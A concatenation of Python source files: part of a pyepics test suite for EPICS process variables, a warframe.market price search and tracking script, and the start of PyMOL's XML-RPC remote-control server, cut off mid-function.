    with no_simulator_updates():
        pv = get_pv(pvnames.int_pv, form='native')
        # Request time type
        md = pv.get_with_metadata(use_monitor=False, form='time')
        assert 'timestamp' in md
        assert 'lower_ctrl_limit' not in md
        # Request control type
        md = pv.get_with_metadata(use_monitor=False, form='ctrl')
        assert 'lower_ctrl_limit' in md
        assert 'timestamp' not in md
        # Use monitor: all metadata should come through
        md = pv.get_with_metadata(use_monitor=True)
        assert 'timestamp' in md
        assert 'lower_ctrl_limit' in md
        # Get a namespace
        ns = pv.get_with_metadata(use_monitor=True, as_namespace=True)
        assert hasattr(ns, 'timestamp')
        assert hasattr(ns, 'lower_ctrl_limit')

def test_get_string_waveform():
    """A string waveform PV yields a list of non-trivial strings."""
    write('String Array: \n')
    with no_simulator_updates():
        pv = get_pv(pvnames.string_arr_pv)
        val = pv.get()
        assert (len(val) > 10)
        assert isinstance(val[0], str)
        assert len(val[0]) > 1
        assert isinstance(val[1], str)
        assert len(val[1]) > 1
def test_putcomplete():
    """put(use_complete=True) eventually reports completion for most puts."""
    write('Put with wait and put_complete (using real motor!) \n')
    vals = (1.35, 1.50, 1.44, 1.445, 1.45, 1.453, 1.446, 1.447, 1.450, 1.450, 1.490, 1.5, 1.500)
    p = get_pv(pvnames.motor1)
    # this works with a real motor, fail if it doesn't connect quickly
    if not p.wait_for_connection(timeout=0.2):
        return
    see_complete = []
    for v in vals:
        t0 = time.time()
        p.put(v, use_complete=True)
        count = 0
        for i in range(100000):
            time.sleep(0.001)
            count = count + 1
            if p.put_complete:
                see_complete.append(True)
                break
        # print( 'made it to value= %.3f, elapsed time= %.4f sec (count=%i)' % (v, time.time()-t0, count))
    assert len(see_complete) > (len(vals) - 5)

def test_putwait():
    """Exercise wait=True, callback= and use_complete= variants of put()."""
    write('Put with wait (using real motor!) \n')
    pv = get_pv(pvnames.motor1)
    # this works with a real motor, fail if it doesn't connect quickly
    if not pv.wait_for_connection(timeout=0.2):
        return
    val = pv.get()
    t0 = time.time()
    if val < 5:
        pv.put(val + 1.0, wait=True)
    else:
        pv.put(val - 1.0, wait=True)
    dt = time.time()-t0
    write(' put took %s sec\n' % dt)
    assert dt > 0.1
    # now with a callback!
    global put_callback_called
    put_callback_called = False
    def onPutdone(pvname=None, **kws):
        print( 'put done ', pvname, kws)
        global put_callback_called
        put_callback_called = True
    val = pv.get()
    if val < 5:
        pv.put(val + 1.0, callback=onPutdone)
    else:
        pv.put(val - 1.0, callback=onPutdone)
    t0 = time.time()
    while time.time()-t0 < dt*1.50:
        time.sleep(0.02)
    write(' put should be done by now? %s \n' % put_callback_called)
    assert put_callback_called
    # now using pv.put_complete
    val = pv.get()
    if val < 5:
        pv.put(val + 1.0, use_complete=True)
    else:
        pv.put(val - 1.0, use_complete=True)
    t0 = time.time()
    count = 0
    while time.time()-t0 < dt*1.50:
        if pv.put_complete:
            break
        count = count + 1
        time.sleep(0.02)
    write(' put_complete=%s (should be True), and count=%i (should be>3)\n' %
          (pv.put_complete, count))
    assert pv.put_complete
    assert count > 3
def test_get_callback():
    """A monitor callback on an updating PV sees several value changes."""
    write("Callback test: changing PV must be updated\n")
    global NEWVALS
    mypv = get_pv(pvnames.updating_pv1)
    NEWVALS = []
    def onChanges(pvname=None, value=None, char_value=None, **kw):
        write( 'PV %s %s, %s Changed!\n' % (pvname, repr(value), char_value))
        NEWVALS.append( repr(value))
    mypv.add_callback(onChanges)
    write('Added a callback. Now wait for changes...\n')
    t0 = time.time()
    while time.time() - t0 < 3:
        time.sleep(1.e-4)
    write(' saw %i changes.\n' % len(NEWVALS))
    assert len(NEWVALS) > 3
    mypv.clear_callbacks()

def test_put_string_waveform():
    """Put/readback of a string array round-trips exactly."""
    write('String Array: put\n')
    with no_simulator_updates():
        pv = get_pv(pvnames.string_arr_pv)
        put_value = ['a', 'b', 'c']
        pv.put(put_value, wait=True)
        get_value = pv.get(use_monitor=False, as_numpy=False)
        numpy.testing.assert_array_equal(get_value, put_value)

def test_put_string_waveform_single_element():
    """A single-element put reads back as a scalar string."""
    write('String Array: put single element\n')
    with no_simulator_updates():
        pv = get_pv(pvnames.string_arr_pv)
        put_value = ['a']
        pv.put(put_value, wait=True)
        time.sleep(0.05)
        get_value = pv.get(use_monitor=False, as_numpy=False)
        assert put_value[0] == get_value

def test_put_string_waveform_mixed_types():
    """Non-string elements are coerced to strings on put."""
    write('String Array: put mixed types\n')
    with no_simulator_updates():
        pv = get_pv(pvnames.string_arr_pv)
        put_value = ['a', 2, 'b']
        pv.put(put_value, wait=True)
        time.sleep(0.05)
        get_value = pv.get(use_monitor=False, as_numpy=False)
        numpy.testing.assert_array_equal(get_value, ['a', '2', 'b'])

def test_put_string_waveform_empty_list():
    """After putting an empty list, only empty strings remain."""
    write('String Array: put empty list\n')
    with no_simulator_updates():
        pv = get_pv(pvnames.string_arr_pv)
        put_value = []
        pv.put(put_value, wait=True)
        time.sleep(0.05)
        get_value = pv.get(use_monitor=False, as_numpy=False)
        assert '' == ''.join(get_value)

def test_put_string_waveform_zero_length_strings():
    """Zero-length strings round-trip unchanged."""
    write('String Array: put zero length strings\n')
    with no_simulator_updates():
        pv = get_pv(pvnames.string_arr_pv)
        put_value = ['', '', '']
        pv.put(put_value, wait=True)
        time.sleep(0.05)
        get_value = pv.get(use_monitor=False, as_numpy=False)
        numpy.testing.assert_array_equal(get_value, put_value)
def test_subarrays():
    """Subarray records track NELM/INDX changes of the driver waveform."""
    write("Subarray test: dynamic length arrays\n")
    driver = get_pv(pvnames.subarr_driver)
    subarr1 = get_pv(pvnames.subarr1)
    subarr1.connect()
    len_full = 64
    len_sub1 = 16
    full_data = numpy.arange(len_full)/1.0
    caput("%s.NELM" % pvnames.subarr1, len_sub1)
    caput("%s.INDX" % pvnames.subarr1, 0)
    driver.put(full_data) ;
    time.sleep(0.1)
    subval = subarr1.get()
    assert (len(subval) == len_sub1)
    assert numpy.all(subval == full_data[:len_sub1])
    write("Subarray test: C\n")
    caput("%s.NELM" % pvnames.subarr2, 19)
    caput("%s.INDX" % pvnames.subarr2, 3)
    subarr2 = get_pv(pvnames.subarr2)
    subarr2.get()
    driver.put(full_data) ; time.sleep(0.1)
    subval = subarr2.get()
    assert len(subval) == 19
    assert (numpy.all(subval == full_data[3:3+19]))
    caput("%s.NELM" % pvnames.subarr2, 5)
    caput("%s.INDX" % pvnames.subarr2, 13)
    driver.put(full_data) ; time.sleep(0.1)
    subval = subarr2.get()
    assert len(subval) == 5
    assert (numpy.all(subval == full_data[13:5+13]))

def test_subarray_zerolen():
    """A zero-length subarray returns an empty float64 ndarray."""
    subarr1 = get_pv(pvnames.zero_len_subarr1)
    subarr1.wait_for_connection()
    val = subarr1.get(use_monitor=True, as_numpy=True)
    assert isinstance(val, numpy.ndarray)
    assert len(val) == 0
    assert val.dtype == numpy.float64
    val = subarr1.get(use_monitor=False, as_numpy=True)
    assert isinstance(val, numpy.ndarray)
    assert len(val) == 0
    assert val.dtype == numpy.float64

def test_waveform_get_with_count_arg():
    """PV(count=N) limits get() length; count= per call overrides it."""
    with no_simulator_updates():
        # NOTE: do not use get_pv() here, as `count` is incompatible with
        # the cache
        wf = PV(pvnames.char_arr_pv, count=32)
        val=wf.get()
        assert len(val) == 32
        val=wf.get(count=wf.nelm)
        assert len(val) == wf.nelm
def test_waveform_callback_with_count_arg():
    """Monitor callbacks honor the count= given at PV creation."""
    values = []
    # NOTE: do not use get_pv() here, as `count` is incompatible with
    # the cache
    wf = PV(pvnames.char_arr_pv, count=32)
    def onChanges(pvname=None, value=None, char_value=None, **kw):
        write( 'PV %s %s, %s Changed!\n' % (pvname, repr(value), char_value))
        values.append( value)
    wf.add_callback(onChanges)
    write('Added a callback. Now wait for changes...\n')
    t0 = time.time()
    while time.time() - t0 < 3:
        time.sleep(1.e-4)
        if len(values)>0:
            break
    assert len(values) > 0
    assert len(values[0]) == 32
    wf.clear_callbacks()

def test_emptyish_char_waveform_no_monitor():
    '''a test of a char waveform of length 1 (NORD=1): value "\0"
    without using auto_monitor
    '''
    with no_simulator_updates():
        zerostr = PV(pvnames.char_arr_pv, auto_monitor=False)
        zerostr.wait_for_connection()
        # elem_count = 128, requested count = None, libca returns count = 1
        zerostr.put([0], wait=True)
        assert zerostr.get(as_string=True) == ''
        numpy.testing.assert_array_equal(zerostr.get(as_string=False), [0])
        assert zerostr.get(as_string=True, as_numpy=False) == ''
        numpy.testing.assert_array_equal(zerostr.get(as_string=False, as_numpy=False), [0])
        # elem_count = 128, requested count = None, libca returns count = 2
        zerostr.put([0, 0], wait=True)
        assert zerostr.get(as_string=True) == ''
        numpy.testing.assert_array_equal(zerostr.get(as_string=False), [0, 0])
        assert zerostr.get(as_string=True, as_numpy=False) == ''
        numpy.testing.assert_array_equal(zerostr.get(as_string=False, as_numpy=False), [0, 0])
        zerostr.disconnect()

def test_emptyish_char_waveform_monitor():
    '''a test of a char waveform of length 1 (NORD=1): value "\0"
    with using auto_monitor
    '''
    with no_simulator_updates():
        zerostr = PV(pvnames.char_arr_pv, auto_monitor=True)
        zerostr.wait_for_connection()
        zerostr.put([0], wait=True)
        time.sleep(0.2)
        assert zerostr.get(as_string=True) == ''
        numpy.testing.assert_array_equal(zerostr.get(as_string=False), [0])
        assert zerostr.get(as_string=True, as_numpy=False) == ''
        numpy.testing.assert_array_equal(zerostr.get(as_string=False, as_numpy=False), [0])
        zerostr.put([0, 0], wait=True)
        time.sleep(0.2)
        assert zerostr.get(as_string=True) == ''
        numpy.testing.assert_array_equal(zerostr.get(as_string=False), [0, 0])
        assert zerostr.get(as_string=True, as_numpy=False) == ''
        numpy.testing.assert_array_equal(zerostr.get(as_string=False, as_numpy=False), [0, 0])
        zerostr.disconnect()
def testEnumPut():
    """Put an enum PV by state name ('Stop') and confirm the numeric readback is 0."""
    pv = get_pv(pvnames.enum_pv)
    assert pv is not None
    pv.put('Stop')
    time.sleep(0.1)  # allow the put to be processed before reading back
    assert pv.get() == 0
def test_DoubleVal():
    """Check CTRL metadata (severity, host, count, precision, units, access)
    of a scalar double PV against the values declared in pvnames."""
    pvn = pvnames.double_pv
    pv = get_pv(pvn)
    pv.get()  # initial get populates the PV's cached state
    cdict = pv.get_ctrlvars()
    write( 'Testing CTRL Values for a Double (%s)\n' % (pvn))
    assert 'severity' in cdict
    assert len(pv.host) > 1
    assert pv.count == 1
    assert pv.precision == pvnames.double_pv_prec
    assert pv.units == pvnames.double_pv_units
    assert pv.access.startswith('read')
# NOTE(review): the name misspells "conversions"; kept as-is so the pytest
# test ID stays stable.
def test_type_converions_2():
    """For several array PVs, fetch the value promoted to CTRL and TIME
    variants and check each element matches the plain native get."""
    write("CA type conversions arrays\n")
    pvlist = (pvnames.char_arr_pv,
              pvnames.long_arr_pv,
              pvnames.double_arr_pv)
    with no_simulator_updates():
        chids = []
        for name in pvlist:
            chid = ca.create_channel(name)
            ca.connect_channel(chid)
            chids.append((chid, name))
            ca.poll(evt=0.025, iot=5.0)
        ca.poll(evt=0.05, iot=10.0)
        # baseline: native-type values for each channel
        values = {}
        for chid, name in chids:
            values[name] = ca.get(chid)
        for promotion in ('ctrl', 'time'):
            for chid, pvname in chids:
                write('=== %s chid=%s as %s\n' % (ca.name(chid),
                                                  repr(chid), promotion))
                time.sleep(0.01)
                if promotion == 'ctrl':
                    ntype = ca.promote_type(chid, use_ctrl=True)
                else:
                    ntype = ca.promote_type(chid, use_time=True)
                val = ca.get(chid, ftype=ntype)
                # NOTE(review): cval is fetched but never compared
                cval = ca.get(chid, as_string=True)
                # promoted array must match the native one element-wise
                for a, b in zip(val, values[pvname]):
                    assert a == b
def test_waveform_get_1elem():
    """Request a single element of an array PV; expect a 1-element ndarray."""
    pv = get_pv(pvnames.double_arr_pv)
    val = pv.get(count=1, use_monitor=False)
    assert isinstance(val, numpy.ndarray)
    assert (len(val) == 1)
def test_subarray_1elem():
    """count=1 get of an array PV returns a length-1 ndarray, and a
    length-1 list when as_numpy=False."""
    with no_simulator_updates():
        # pv = get_pv(pvnames.zero_len_subarr1)
        pv = get_pv(pvnames.double_arr_pv)
        pv.wait_for_connection()
        val = pv.get(count=1, use_monitor=False)
        print('val is', val, type(val))
        assert isinstance(val, numpy.ndarray)
        assert len(val) == 1
        val = pv.get(count=1, as_numpy=False, use_monitor=False)
        print('val is', val, type(val))
        assert isinstance(val, list)
        assert len(val) == 1
@pytest.mark.parametrize('num_threads', [1, 10, 200])
@pytest.mark.parametrize('thread_class', [ca.CAThread, threading.Thread])
def test_multithreaded_get(num_threads, thread_class):
    """Many threads read the same PV concurrently; every thread must see
    the same (plain, ctrl, time) triple."""
    def thread(thread_idx):
        # each worker records its three reads under its own index
        result[thread_idx] = (pv.get(),
                              pv.get_with_metadata(form='ctrl')['value'],
                              pv.get_with_metadata(form='time')['value'],
                              )
    result = {}
    ca.use_initial_context()
    pv = get_pv(pvnames.double_pv)
    # NOTE(review): the loop variable below shadows the worker function
    # `thread` after this list is built — harmless, but confusing
    threads = [thread_class(target=thread, args=(i, ))
               for i in range(num_threads)]
    with no_simulator_updates():
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
    assert len(result) == num_threads
    print(result)
    values = set(result.values())
    assert len(values) != 0
    # single-element unpack: fails unless every thread produced the same tuple
    value, = values
    assert value is not None
@pytest.mark.parametrize('num_threads', [1, 10, 100])
def test_multithreaded_put_complete(num_threads):
    """Each thread does a completed put with a per-thread callback payload;
    every payload must be delivered exactly once."""
    def callback(pvname, data):
        # collect the callback_data payload passed to put()
        result.append(data)
    def thread(thread_idx):
        pv.put(thread_idx, callback=callback,
               callback_data=dict(data=thread_idx),
               wait=True)
        time.sleep(0.1)
    result = []
    ca.use_initial_context()
    pv = get_pv(pvnames.double_pv)
    threads = [ca.CAThread(target=thread, args=(i, ))
               for i in range(num_threads)]
    with no_simulator_updates():
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
    assert len(result) == num_threads
    print(result)
    # every thread index must appear in the delivered payloads
    assert set(result) == set(range(num_threads))
def test_force_connect():
    """Disconnect a monitored array PV, force_connect it again, and verify
    both gets and subscription callbacks work after the reconnect."""
    pv = get_pv(pvnames.double_arrays[0], auto_monitor=True)
    print("Connecting")
    assert pv.wait_for_connection(5.0)
    print("SUM", pv.get().sum())
    time.sleep(3)
    print("Disconnecting")
    pv.disconnect()
    print("Reconnecting")
    pv.force_connect()
    assert pv.wait_for_connection(5.0)
    # mutable flag so the nested callback can signal it ran
    called = {'called': False}
    def callback(value=None, **kwargs):
        called['called'] = True
        print("update", value.sum())
    pv.add_callback(callback)
    time.sleep(1)  # wait for at least one monitor update to arrive
    assert pv.get() is not None
    assert called['called']
|
WM_API_Price_Finder.py | import requests
import json
import datetime
import webbrowser
import os.path
from time import sleep
#import for keyboard stop loop
from pynput import keyboard
from threading import Thread
# URL storage
main_URL = "https://api.warframe.market/v1/items"
login_URL = "https://api.warframe.market/v1/auth/signin"
profile_URL = "https://api.warframe.market/v1/profile"
# Global variables
Date_Today = datetime.date.today()
Date_Current = Date_Today.strftime("%Y-%m-%d")
Date_Yesterday = (Date_Today - datetime.timedelta(days=1)).strftime("%Y-%m-%d")
Keep_going = True
Track_file = "tracked.json"
# Function for the begining of the program for showing the first text and choose waht to do
def start_menu():
    """Print the feature overview and dispatch to search or tracking mode."""
    Info_text = ("\nThis program has the following features : \n- A search function for a mod or item of the market,"
                 "\n- A tracking feature for set items and price in a file that you can modify via this program or directly."
                 "\n\tYou will be alerted if one or more items are available on the website at the set price or lower")
    print(Info_text)
    # keep prompting until a recognised choice is entered
    while True:
        print("\nWhat do you want to do :\n1 : search (default) \t 2 : track item price")
        choice = input()
        if choice in ("", "1"):
            search_item()
            return
        if choice == "2":
            tracking_prices_management()
            return
        print("\nError while selecting the feature, try again")
#Function to select which platform you use
def platform_selector():
    """Ask the user which platform to query and return its upper-cased slug."""
    while True:
        print("\nFor which platform do you want to use this program ? PC is by default\n 1 - PC \t2 - PS4 \t3 - XBOX \t4 - SWITCH\n")
        choice = input()
        if choice in ("1", "2", "3", "4", ""):
            if choice == "":
                choice = "1"  # empty input means the PC default
            break
        print("\nError while selecting the platform")
    platform = platform_print(choice).upper()
    print("You have chosen the following platform :", platform)
    return platform
# Function for printing the chosen platform
def platform_print(input_plat: str):
    """Map a menu digit ("1".."4") to its warframe.market platform slug.

    Returns None for any unrecognised input.
    """
    slugs = {"1": 'pc', "2": 'ps4', "3": 'xbox', "4": 'switch'}
    return slugs.get(input_plat)
# Ask to open the web page of the requested item
def browser_open(search_string: str):
    """Offer to open the warframe.market page for *search_string* in a browser."""
    print("\nWould you like to buy/sell " + search_string.upper().replace('_', ' ') + " ? y/N")
    if input() == "y":
        # the site uses underscores in item URLs
        webbrowser.open_new('https://warframe.market/items/' + search_string.replace(' ', '_'))
# Restart the script by going to main menu
def restart_script():
    """Ask whether to return to the main menu; otherwise prompt to exit.

    Bug fix: the prompt advertises "Y/n" but only a lowercase "y" was
    accepted; the answer is now compared case-insensitively.
    """
    print("\nDo you want to go to the main menu ? Y/n")
    restart_menu = input()
    if restart_menu.lower() == "y" or restart_menu == "":
        start_menu()
    else:
        print('\nPress Enter to close the program')
# Function that will search for a specific item or mod in the market2
def search_item():
    """Interactively search warframe.market for an item and print the lowest
    recent sell prices (orders from today or yesterday, sorted by price).

    Fixes: removed the unused `MinPrice` lookup (which raised IndexError on
    an empty order list), removed a leftover debug print of the response
    type, replaced the manual i/j insert bookkeeping with a plain append,
    and made the restart answer case-insensitive to match its "Y/n" prompt.
    """
    nbr_item_output = 10
    platform_search = platform_selector()
    # Keep asking until the API recognises the item name (HTTP 200)
    while True:
        print("\nSearch for an item")
        wm_search = input()
        print("\nSearching for " + wm_search.upper().replace('_', ' ') + "...\n")
        # Request the item's orders on the chosen platform
        head = {'content type': 'application/json', 'Platform': platform_print(platform_search)}
        wm_item_request = requests.get('https://api.warframe.market/v1/items/' + wm_search.replace(' ', '_') + '/orders', headers=head)
        print(wm_item_request)
        if wm_item_request.status_code == 200:
            print("Request OK\n")
            break
        elif wm_item_request.status_code == 404:
            print("Request failed\n\nMake sure to use the proper name of items, ex : mesa prime set, mesa prime blueprint\n")
    data = wm_item_request.json()
    data_access = data['payload']['orders']
    # Keep only sell orders last updated today or yesterday
    wm_list = []
    for item in data_access:
        if item['order_type'] == "sell":
            data_date = item['last_update'][0:10]  # ISO date prefix
            if data_date == Date_Current or data_date == Date_Yesterday:
                wm_list.append(item)
    # Sort by price first, then by update time
    sorted_wm_list = sorted(wm_list, key=lambda x: (x['platinum'], x['last_update']))
    wm_list_len = len(sorted_wm_list)
    # Show at most 10 results, or everything when fewer were found
    if wm_list_len < nbr_item_output:
        nbr_item_output = wm_list_len
    print("\nThe", nbr_item_output, "minimum prices found in the last ~24 hours all status combined for " + wm_search.upper().replace('_', ' ') + " are\n")
    for element in range(nbr_item_output):
        print(sorted_wm_list[element]['platinum'], "platinum as of :", sorted_wm_list[element]['last_update'][0:10])
    browser_open(wm_search)
    print("\nStart a new search? Y/n")
    restart_answer = input()
    if restart_answer.lower() == "y" or restart_answer == "":
        search_item()
    else:
        restart_script()
# Function that split the tracking features into others function for more clarity in the code
def tracking_prices_management():
    """Sub-menu for the price-tracking features: launch the tracking loop,
    edit the tracked file, list tracked items, or return to the main menu.

    Fix: corrected the user-facing typo/grammar in the option-3 message
    ("Here is what is the items tracked insid tracked.json").
    """
    while True:
        print("\nEntered tracking prices menu, what do you want to do :\n1 : Launch track mode \t2 : Add/Remove an item/mod/arcane \t3 : See the list of track items \t4 : Returning to the main menu\n")
        track_input = input()
        if track_input == "" or track_input == "1":
            tracking_prices()
            break
        elif track_input == "2":
            # no break: return to this menu after editing the file
            trackfile_management()
        elif track_input == "3":
            print("\nHere are the items tracked inside tracked.json")
            tracked_print()
            break
        elif track_input == "4":
            restart_script()
        else:
            print("Error while choosing what to do, try again")
    restart_script()
# Loop for tracking the prices of set items in json file
def loop_price_check(loop_frequency:int, data_loop:dict, plateform:str):
    """Poll warframe.market every *loop_frequency* minutes for each tracked
    entry in *data_loop* and print online/ingame sell orders at or below
    the tracked price. Runs until the global Keep_going flag is cleared
    (by the keyboard listener's on_press).

    NOTE(review): parameter name "plateform" is a typo for "platform";
    kept because renaming would break keyword callers.
    """
    while Keep_going:
        head = {'content type': 'application/json', 'Platform': platform_print(plateform)}
        # double loop that requests every item listed in tracked.json
        for categories in data_loop:
            print("\n\nFor the", categories, "category :")
            for element in data_loop[categories]:
                list_items = []
                # try each request separately so a typo in one entry does
                # not abort the whole pass
                try:
                    wf_track_item = requests.get('https://api.warframe.market/v1/items/' + element['name'].lower().replace(' ', '_') + '/orders', headers=head)
                    # extract the order list for this tracked entry
                    data_track_item = wf_track_item.json()
                    dt = data_track_item['payload']['orders']
                    output_structure={}
                    # collect online/ingame sell offers at or below the set price
                    for wf_item in dt:
                        if wf_item['order_type'] == "sell" and (wf_item['user']['status'] == "online" or wf_item['user']['status'] == "ingame"):
                            if wf_item['platinum'] <= element['price']:
                                list_items.append({'name': wf_item['user']['ingame_name'], 'price' : wf_item['platinum'], 'reg': wf_item['user']['region']})
                    output_structure[str(element['name'])] = list_items
                    print("\n-",element['name'].upper().replace('_', ' '), ":", str(element['price']), "platinum")
                    # print matches by increasing price
                    output_sorted = sorted(output_structure[element['name']], key=lambda x: x['price'])
                    for k in output_sorted:
                        print("\tPrice :", k['price'], "\tRegion :", k['reg'],"\t","Player name :", k['name'], )
                except Exception:
                    print("\nError with", element['name'],"check that it's using the correct format")
                    continue
            if data_loop[categories] == []:
                print("\nNo items to track in the", categories, "category")
        #pprint.pprint(output_structure)
        print("\nAuto search done, doing it again in", loop_frequency,"minutes")
        sleep(loop_frequency*60)
# Detection of pressed key
def on_press(key, abortKey='esc'):
    """pynput key handler: clear the global Keep_going flag and stop the
    listener when *abortKey* is pressed.

    Fix: the bare `except` is narrowed to AttributeError — only special
    keys lack the `.char` attribute; any other error should surface.
    """
    global Keep_going
    try:
        k = key.char  # single-char keys
    except AttributeError:
        k = key.name  # other (special) keys
    if k == abortKey:
        Keep_going = False
        print('\nEnd of checking prices')
        sleep(1)
        return False  # returning False stops the pynput listener
# Function that launch the tracking loop, ask how often the loop is refreshed and create tracked.json if not created
def tracking_prices():
    """Start the tracking loop: ask for a refresh interval, create
    tracked.json if missing, then run loop_price_check in a daemon thread
    until Escape is pressed (detected by a pynput keyboard listener)."""
    check_price_time = 5
    platform_track = platform_selector()
    while True:
        print("\nTracking prices mode, how frequently do you want to check prices in minutes ? Press Enter for default 5 min")
        check_price_time = input()
        if check_price_time.isnumeric() and int(check_price_time) > 0:
            break
        elif check_price_time == "":
            check_price_time = 5  # Enter keeps the 5-minute default
            break
        else:
            print("Error while setting loop time check, enter an integer value")
    print("\nPress escape to end the tracking loop")
    # initialize tracked.json fields if the file was not already created
    file_structure = {"items": [],"mods": [], "arcanes":[]}
    if os.path.isfile(Track_file):
        print("Tracked file present in directory")
    else:
        print("File not present, creating it")
        write_json(file_structure, Track_file)
    data_tracked = load_json(Track_file)
    abortKey = 'esc'
    # NOTE(review): pynput's Listener may not forward the abortKey kwarg to
    # on_press — confirm; the usual recipe wraps on_press in a lambda.
    listener = keyboard.Listener(on_press=on_press, abortKey=abortKey)
    listener.start() # start to listen on a separate thread
    # start the polling loop in a daemon thread so Escape can end the program
    Thread(target=loop_price_check, args=(int(check_price_time), data_tracked, platform_track), name='loop_price_check', daemon=True).start()
    listener.join() # wait for abortKey
#Function where you can add or delete items in tracked.json
def trackfile_management():
    """Interactively add an entry to, or remove an entry from, tracked.json.

    Fixes: removed the dead `isinstance(..., float)` guards (the values come
    from input().split() and are always strings, so the check was always
    False) and replaced `len(words) < 3 or len(words) > 3` with `!= 3`.
    """
    print("\nHere is the current track items :")
    tracked_print()
    # loop until a well-formed command is entered, to keep typos out of tracked.json
    while True:
        print("\n\nTo add a new item use the key word add , then the category (items, mods, arcanes) and the name, with or without '_' symbol and the limit price"
              "\nTo remove an item use the key word remove or rm, then the category (items, mods, arcanes) and the line number of the item"
              "\nExample : add flow mods 15 /// remove items 1\n")
        input_management = input()
        words = input_management.split(' ')
        command_type = words[0]
        if command_type == "add":
            if len(words) < 4:
                print("error typing")
            else:
                category = words[-2]
                price = words[-1]
                name = words[1:-2]  # everything between the command and the category
                if category not in ("items", "mods", "arcanes"):
                    print("\nError while choosing the category, use items, mods or arcanes")
                elif not price.isdigit() or int(price) <= 0:
                    print("\nError while choosing the price, use positive non null integer numbers")
                else:
                    adding = {'name': ' '.join(name), 'price': int(price)}
                    break
        elif command_type == "remove" or command_type == "rm":
            if len(words) != 3:
                print("error typing")
            else:
                category = words[1]
                row = words[-1]
                if category not in ("items", "mods", "arcanes"):
                    print("\nError while choosing the category, use items, mods or arcanes")
                elif not row.isdigit() or int(row) <= 0:
                    print("\nError while choosing the line to delete, use positive non null integer numbers")
                else:
                    # convert to a 0-based index (the menu shows 1-based lines)
                    row = int(row)-1
                    break
        else:
            print("\nError while typing command")
    data = load_json(Track_file)
    if command_type == "add":
        add_json(data, Track_file, category, adding)
        print("Data added")
    elif command_type == "remove" or command_type == "rm":
        del_json(data, Track_file, category, row)
        print("Data removed")
# Print tracked.json data
def tracked_print():
    """Pretty-print the tracked file, one category per group."""
    tracked = load_json(Track_file)
    for category, entries in tracked.items():
        print("\n-", category)
        for entry in entries:
            # pad the name to 25 characters so the prices line up
            print("\t{:<25s} at {} platinum".format(entry['name'].upper(), entry['price']))
# Load all the data of the passed file
def load_json(filename: str):
    """Return the parsed JSON content of *filename*."""
    with open(filename) as handle:
        return json.load(handle)
# Function that write given data in a given file
def write_json(data: dict, filename: str):
    """Serialize *data* to *filename* as indented (pretty-printed) JSON."""
    with open(filename, "w") as handle:
        json.dump(data, handle, indent=4)
# Function that add a given item in tracked.json
def add_json(data:dict, filename:str, selector:str, text:dict):
    """Append the entry *text* to the *selector* category of *filename*.

    NOTE(review): the *data* argument is immediately overwritten by
    re-reading *filename*, so callers' in-memory copies are ignored; the
    parameter is kept only for signature compatibility.
    """
    with open(filename) as file:
        data = json.load(file)
    tmp = data[selector]
    tmp.append(text)
    write_json(data, filename)
# Function that delete a given dict in the list of tracked.json
def del_json(data:dict, filename:str, selector:str, row:int):
    """Delete entry number *row* (0-based) from the *selector* category
    of *filename*.

    NOTE(review): as in add_json, the *data* argument is immediately
    overwritten by re-reading *filename*; kept for signature compatibility.
    """
    with open(filename) as file:
        data = json.load(file)
    tmp = data[selector]
    tmp.pop(row)
    write_json(data, filename)
###########################################################################################################################
# MAIN #
###########################################################################################################################
def main():
    """Ping the warframe.market API and, if it answers, open the main menu."""
    print("Testing API responses\n")
    response = requests.get(main_URL)
    print(response)
    # only start the interactive menus when the API is reachable
    status = response.status_code
    if status == 200:
        print("API OK\n")
        start_menu()
    elif status == 404:
        print("API ERROR\n")
        print("Something is wrong about the status of the API, check the URL used, the status of warframe market, your internet connection, your firewall and launch again the program.")
    else:
        print(status)
        print("Something is wrong about the status of the API, check the URL used, the status of warframe market, your internet connection, your firewall and launch again the program.")
    close_input = input() # to not instantly close the window program
# Entry point: only run the client when executed as a script, not on import.
if __name__ == "__main__":
    main()
|
rpc.py | """ an XML-RPC server to allow remote control of PyMol
Author: Greg Landrum (glandrum@users.sourceforge.net)
Created: January 2002
$LastChangedDate: 2016-12-05 14:04:04 -0500 (Mon, 05 Dec 2016) $
License: PyMol
Requires:
- a python xmlrpclib distribution containing the SimpleXMLRPCServer
module (1.0 or greater should be fine)
- python with threading enabled
RD Version: $Rev: 4164 $
Modified 2013-04-17 Thomas Holder, Schrodinger, Inc.
"""
from __future__ import print_function
import sys
if sys.version_info[0] == 2:
import SimpleXMLRPCServer
else:
import xmlrpc.server as SimpleXMLRPCServer
import threading,os,tempfile
from pymol import cmd,cgo
# initial port to try for the server
_xmlPort=9123
# number of alternate ports to try if the first fails
_nPortsToTry=5
def rpcPing():
    """Liveness probe for the XML-RPC server.

    Call this right after connecting to confirm the server answers.
    Always returns 1.
    """
    return 1
def rpcLabel(pos,labelText,id='lab1',color=(1,1,1)):
    """ create a text label
    Arguments:
      pos: a 3 tuple with the position of the label
      labelText: a string with the label
      color: a 3 tuple with the color of the label. (1,1,1) is white
      id: (OPTIONAL) the name of the object to be created
    NOTE:
      at the moment this is, how you say, a hack
    """
    # repr() keeps the text quoted the way pseudoatom's label parser expects
    cmd.pseudoatom(id, label=repr(labelText), elem='C', pos=pos)
    # register a per-label color and apply it to the pseudoatom
    cmd.set_color("%s-color"%id,color)
    cmd.color("%s-color"%id,id)
    return 1
def rpcResetCGO(id):
    """Remove a CGO from the local dictionary.

    "*" clears the whole dictionary. Returns 1 on success, 0 when the
    id is unknown.
    """
    global cgoDict
    if id == "*":
        cgoDict = {}
        return 1
    if id in cgoDict:
        del cgoDict[id]
        return 1
    return 0
def rpcSphere(pos,rad,color,id='cgo',extend=1,
              transparent=0,transparency=0.5):
    """ create a sphere
    Arguments:
      pos: a 3 tuple with the position of the sphere
      rad: a float with the radius
      color: a 3 tuple with the color of the sphere. (1,1,1) is white
      id: (OPTIONAL) the name of the object to be created
      extend: (OPTIONAL) if this is nonzero, the sphere is appended to any
        CGO already stored under this id; if zero the object is rebuilt
        from scratch
      transparent: (OPTIONAL) sets the object to be transparent
      transparency: (OPTIONAL) the percent transparency of the object
    """
    r,g,b = color
    x,y,z = pos
    if extend:
        # start from the CGO primitives already stored under this id
        obj = cgoDict.get(id,[])
    else:
        obj = []
    if not transparent:
        o = []
    else:
        # an ALPHA op applies to the primitives that follow it
        o = [cgo.ALPHA,1-transparency]
    o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
    obj.extend(o)
    # remember the full primitive list so later extend=1 calls can append
